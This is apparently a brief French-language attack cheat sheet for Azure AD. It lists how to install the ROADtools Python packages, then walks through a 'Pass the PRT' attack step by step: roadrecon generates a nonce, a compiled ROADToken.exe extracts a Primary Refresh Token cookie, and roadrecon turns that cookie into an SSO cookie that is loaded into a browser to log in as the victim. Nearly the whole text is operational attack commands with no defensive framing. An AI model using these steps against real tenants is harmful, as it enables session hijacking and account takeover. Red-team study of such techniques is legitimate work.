Def :

C'est un outil pour intéragir avec Azure sous windows qui va nous permettre notament avec ROADrecond de faire des attaques.

Installation :

Prérequis : Python

pip install roadlib
pip install roadrecon
pip install roadtx

Exloitation :

Pass the PRT :

roadrecon auth --prt-init

AwABEgEAAAACAOz_BQD0_4xCBJ3O_M2HMlTngT5nJrHsm5wbGMTyGOhllM1v0RKqj_kgFcMZRuk3RZs-8qzGFx-kSkFwIBQbZIbqiwd5k48gAA

On peut ensuite utiliser ce prt pour request un cookie avec cet outil qu'il faut compiler en utilisant VS studio (et en installant le bon framework de dev). (chercher RoadTOKEN.exe)

.\ROADToken.exe AwABEgEAAAACAOz_BQD0_TOKEN_SAMPLE

Le token est après data: :
On aura ensuite a faire :

roadrecon auth --prt-cookie <Cookie>

ce qui va nous donner un cookie de SSO a mettre dans notre navigateur pour se connecter